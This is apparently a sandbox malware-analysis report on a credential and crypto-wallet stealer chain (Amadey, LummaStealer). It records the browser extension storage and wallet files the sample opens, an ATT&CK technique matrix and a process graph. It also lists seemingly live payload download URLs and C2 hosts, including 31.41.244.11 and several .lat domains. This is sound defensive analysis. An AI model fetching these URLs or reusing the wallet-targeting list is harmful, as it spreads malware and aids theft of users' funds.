                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                              Source: C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                              Source: Yara matchFile source: 0000001B.00000002.2975513113.0000000000C1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001B.00000002.2975513113.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exe, type: DROPPED
                              Source: Yara matchFile source: 00000016.00000002.2756608289.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.2737718865.0000000000BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000003.2741442978.0000000000880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.2741544851.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B9EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_00B9EC48
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B9DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_00B9DF51
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting
                              Valid Accounts2
                              Windows Management Instrumentation
                              1
                              Scripting
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              1
                              OS Credential Dumping
                              1
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              12
                              Ingress Tool Transfer
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API
                              1
                              DLL Side-Loading
                              112
                              Process Injection
                              1
                              Deobfuscate/Decode Files or Information
                              21
                              Input Capture
                              2
                              File and Directory Discovery
                              Remote Desktop Protocol2
                              Data from Local System
                              11
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Command and Scripting Interpreter
                              11
                              Scheduled Task/Job
                              11
                              Scheduled Task/Job
                              4
                              Obfuscated Files or Information
                              Security Account Manager345
                              System Information Discovery
                              SMB/Windows Admin Shares21
                              Input Capture
                              3
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts11
                              Scheduled Task/Job
                              Login HookLogin Hook23
                              Software Packing
                              NTDS1051
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture124
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts1
                              PowerShell
                              Network Logon ScriptNetwork Logon Script1
                              Timestomp
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading
                              Cached Domain Credentials271
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                              Masquerading
                              DCSync1
                              Application Window Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job271
                              Virtualization/Sandbox Evasion
                              Proc Filesystem1
                              Remote System Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                              Process Injection
                              /etc/passwd and /etc/shadow1
                              System Network Configuration Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578014 Sample: file.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 111 aspecteirs.lat 2->111 113 sweepyribs.lat 2->113 115 3 other IPs or domains 2->115 131 Suricata IDS alerts for network traffic 2->131 133 Found malware configuration 2->133 135 Antivirus detection for URL or domain 2->135 137 18 other signatures 2->137 11 skotes.exe 35 2->11         started        16 file.exe 5 2->16         started        18 skotes.exe 2->18         started        20 Intel_PTT_EK_Recertification.exe 2->20         started        signatures3 process4 dnsIp5 125 185.215.113.43, 49748, 49754, 49777 WHOLESALECONNECTIONSNL Portugal 11->125 127 31.41.244.11, 49763, 49787, 49823 AEROEXPRESS-ASRU Russian Federation 11->127 99 C:\Users\user\AppData\...\96ae609d19.exe, PE32 11->99 dropped 101 C:\Users\user\AppData\...\641d24797a.exe, PE32 11->101 dropped 103 C:\Users\user\AppData\...\54326d271c.exe, PE32 11->103 dropped 109 11 other malicious files 11->109 dropped 187 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->187 189 Hides threads from debuggers 11->189 191 Tries to detect sandboxes / dynamic malware analysis system (registry check) 11->191 193 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 11->193 22 e56fffc2ce.exe 11->22         started        27 ac68c6b737.exe 11->27         started        29 54326d271c.exe 11->29         started        33 3 other processes 11->33 105 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->105 dropped 107 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->107 dropped 195 Detected unpacking (changes PE section rights) 16->195 197 Tries to evade debugger and weak emulator (self modifying code) 16->197 199 Tries to detect virtualization through RDTSC time measurements 16->199 31 skotes.exe 16->31         started        201 Antivirus detection for dropped file 18->201 203 Multi AV Scanner detection for dropped file 18->203 205 Machine Learning detection for dropped file 18->205 207 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 18->207 file6 signatures7 process8 dnsIp9 121 github.com 20.233.83.145, 443, 49867 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->121 123 raw.githubusercontent.com 185.199.111.133, 443, 49875 FASTLYUS Netherlands 22->123 89 C:\...\1be411a3d2ff4d5e9f89420f2740d28f.exe, PE32 22->89 dropped 159 Machine Learning detection for dropped file 22->159 161 Adds a directory exclusion to Windows Defender 22->161 35 1be411a3d2ff4d5e9f89420f2740d28f.exe 22->35         started        39 powershell.exe 22->39         started        41 powershell.exe 22->41         started        43 conhost.exe 22->43         started        163 Detected unpacking (changes PE section rights) 27->163 165 Tries to detect sandboxes and other dynamic analysis tools (window names) 27->165 167 Tries to evade debugger and weak emulator (self modifying code) 27->167 169 Switches to a custom stack to bypass stack traces 27->169 45 svchost.exe 27->45         started        47 WerFault.exe 27->47         started        91 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 29->91 dropped 93 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 29->93 dropped 171 Multi AV Scanner detection for dropped file 29->171 49 cmd.exe 29->49         started        173 Hides threads from debuggers 31->173 175 Tries to detect sandboxes / dynamic malware analysis system (registry check) 31->175 177 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 31->177 179 Injects a PE file into a foreign processes 33->179 51 zudFSfy.exe 2 33->51         started        53 4 other processes 33->53 file10 signatures11 process12 dnsIp13 117 aspecteirs.lat 104.21.66.85, 443, 49889, 49896 CLOUDFLARENETUS United States 35->117 139 Antivirus detection for dropped file 35->139 141 Multi AV Scanner detection for dropped file 35->141 143 Detected unpacking (changes PE section rights) 35->143 155 4 other signatures 35->155 145 Loading BitLocker PowerShell Module 39->145 55 conhost.exe 39->55         started        57 conhost.exe 41->57         started        147 Checks if the current machine is a virtual machine (disk enumeration) 45->147 149 Switches to a custom stack to bypass stack traces 45->149 151 Uses cmd line tools excessively to alter registry or file data 49->151 59 in.exe 49->59         started        63 7z.exe 49->63         started        65 conhost.exe 49->65         started        67 9 other processes 49->67 153 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 51->153 119 grannyejh.lat 104.21.64.80, 443, 49918 CLOUDFLARENETUS United States 53->119 signatures14 process15 file16 95 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 59->95 dropped 181 Suspicious powershell command line found 59->181 183 Uses cmd line tools excessively to alter registry or file data 59->183 185 Uses schtasks.exe or at.exe to add and modify task schedules 59->185 69 powershell.exe 59->69         started        72 attrib.exe 59->72         started        74 attrib.exe 59->74         started        76 schtasks.exe 59->76         started        97 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 63->97 dropped signatures17 process18 signatures19 157 Uses ping.exe to check the status of other devices and networks 69->157 78 PING.EXE 69->78         started        81 conhost.exe 69->81         started        83 conhost.exe 72->83         started        85 conhost.exe 74->85         started        87 conhost.exe 76->87         started        process20 dnsIp21 129 127.0.0.1 unknown unknown 78->129

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              file.exe54%VirustotalBrowse
                              file.exe47%ReversingLabsWin32.Infostealer.Tinba
                              file.exe100%AviraTR/Crypt.TPM.Gen
                              file.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe100%AviraHEUR/AGEN.1314134
                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%AviraHEUR/AGEN.1352802
                              C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%AviraHEUR/AGEN.1352802
                              C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017355001\96ae609d19.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zudFSfy[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017319001\zudFSfy.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017352001\ac68c6b737.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Temp\1017321001\kz8ZdyP.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kz8ZdyP[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe88%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe11%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe71%ReversingLabsWin32.Trojan.LummaStealer
                              C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe11%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe88%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Temp\1017354001\641d24797a.exe71%ReversingLabsWin32.Trojan.LummaStealer
                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe47%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\main\extracted\in.exe67%ReversingLabsWin64.Trojan.Nekark
                              C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe67%ReversingLabsWin64.Trojan.Nekark
                              C:\unrlkpjy\1be411a3d2ff4d5e9f89420f2740d28f.exe61%ReversingLabsWin32.Trojan.LummaStealer
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              https://api.libertyreserve.com/beta/xml/transfer.aspx0%Avira URL Cloudsafe
                              https://api.libertyreserve.com/beta/xml/balance.aspx0%Avira URL Cloudsafe
                              http://31.41.244.11/files/x3team/random.exe90%Avira URL Cloudsafe
                              http://31.41.244.11/files/x3team/random.exeded0%Avira URL Cloudsafe
                              http://31.41.244.11/files/x3team/random.exe%0%Avira URL Cloudsafe
                              http://31.41.244.11/files/1293295511/zudFSfy.exe100%Avira URL Cloudphishing
                              http://31.41.244.11/files/burpin1/random.exeW0%Avira URL Cloudsafe
                              http://31.41.244.11/files/x3team/random.exe100%Avira URL Cloudphishing
                              https://aspecteirs.lat/api100%Avira URL Cloudmalware
                              https://api.libertyreserve.com/beta/xml/history.aspx0%Avira URL Cloudsafe
                              http://31.41.244.11/files/1293295511/kz8ZdyP.exei0%Avira URL Cloudsafe
                              https://sci.libertyreserve.com/0%Avira URL Cloudsafe
                              http://31.41.244.11/files/unique3/random.exeo0%Avira URL Cloudsafe
                              http://31.41.244.11/files/1293295511/zudFSfy.exeshqos.dll0%Avira URL Cloudsafe
                              http://31.41.244.11/files/x3team/random.exed0%Avira URL Cloudsafe
                              http://31.41.244.11/files/x3team/random.exeI0%Avira URL Cloudsafe
                              http://31.41.244.11/files/1293295511/kz8ZdyP.exe100%Avira URL Cloudphishing
                              https://api.libertyreserve.com/beta/xml/accountname.aspx0%Avira URL Cloudsafe
                              http://31.41.244.11/files/lolz/random.exe100%Avira URL Cloudphishing
                              https://api.libertyreserve.com/beta/xml/history.aspxS0%Avira URL Cloudsafe
                              http://github.comd0%Avira URL Cloudsafe
                              http://31.41.244.11/iles/x3team/random.exe0%Avira URL Cloudsafe
                              http://31.41.244.11/files/x3team/random.exe76-s0%Avira URL Cloudsafe
                              https://api.libertyreserve.com/beta/xml/0%Avira URL Cloudsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              github.com
                              20.233.83.145
                              truefalse
                                high
                                raw.githubusercontent.com
                                185.199.111.133
                                truefalse
                                  high
                                  aspecteirs.lat
                                  104.21.66.85
                                  truetrue
                                    unknown
                                    grannyejh.lat
                                    104.21.64.80
                                    truefalse
                                      high
                                      sweepyribs.lat
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        aspecteirs.latfalse
                                          high
                                          http://185.215.113.43/Zu7JuNko/index.phpfalse
                                            high
                                            sweepyribs.latfalse
                                              high
                                              sustainskelet.latfalse
                                                high
                                                rapeflowwj.latfalse
                                                  high
                                                  energyaffai.latfalse
                                                    high
                                                    https://aspecteirs.lat/apitrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    grannyejh.latfalse
                                                      high
                                                      https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxefalse
                                                        high
                                                        necklacebudi.latfalse
                                                          high
                                                          crosshuaht.latfalse
                                                            high
                                                            https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exefalse
                                                              high
                                                              https://github.com/Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exefalse
                                                                high
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://31.41.244.11/files/unique3/random.exeskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.microsofte56fffc2ce.exe, 0000000E.00000002.2875306579.0000000006660000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.fontbureau.com/designerszudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://31.41.244.11/files/1293295511/zudFSfy.exeskotes.exe, 00000006.00000002.2970891358.000000000076C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2970891358.0000000000748000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          http://31.41.244.11/files/x3team/random.exeskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: phishing
                                                                          unknown
                                                                          http://www.sajatypeworks.comzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.founder.com.cn/cn/cThezudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://api.libertyreserve.com/beta/xml/transfer.aspxkz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://aka.ms/pscore6lBpowershell.exe, 00000010.00000002.2671093967.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000010.00000002.2686734514.0000000005905000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.galapagosdesign.com/DPleasezudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.urwpp.deDPleasezudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.zhongyicts.com.cnzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namee56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2671093967.00000000048A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://api.libertyreserve.com/beta/xml/balance.aspxkz8ZdyP.exe, 0000000B.00000002.2572094309.0000000002831000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#skotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://stackoverflow.com/q/14436606/23354kz8ZdyP.exe, 0000000D.00000002.2573081196.0000000002ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.2671093967.00000000049F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://api.libertyreserve.com/beta/xml/history.aspxzudFSfy.exe, 00000007.00000000.2406021638.00000000008F2000.00000002.00000001.01000000.00000009.sdmp, kz8ZdyP.exe, 0000000B.00000000.2495215505.00000000001D2000.00000002.00000001.01000000.00000011.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://31.41.244.11/files/x3team/random.exe%skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 00000013.00000002.2754514993.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://31.41.244.11/files/x3team/random.exededskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://31.41.244.11/files/burpin1/random.exeWskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://31.41.244.11/files/dodo/random.exeskotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.carterandcone.comlzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://31.41.244.11/files/x3team/random.exe9skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlzudFSfy.exe, 00000007.00000002.2486571810.0000000009412000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.microe56fffc2ce.exe, 0000000E.00000002.2875306579.0000000006660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2724345565.0000000000A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://raw.githubusercontent.come56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zskotes.exe, 00000006.00000002.2970891358.00000000007D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.2671093967.00000000049F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2728388564.0000000004895000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://raw.githubusercontent.come56fffc2ce.exe, 0000000E.00000002.2860539460.0000000002CAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
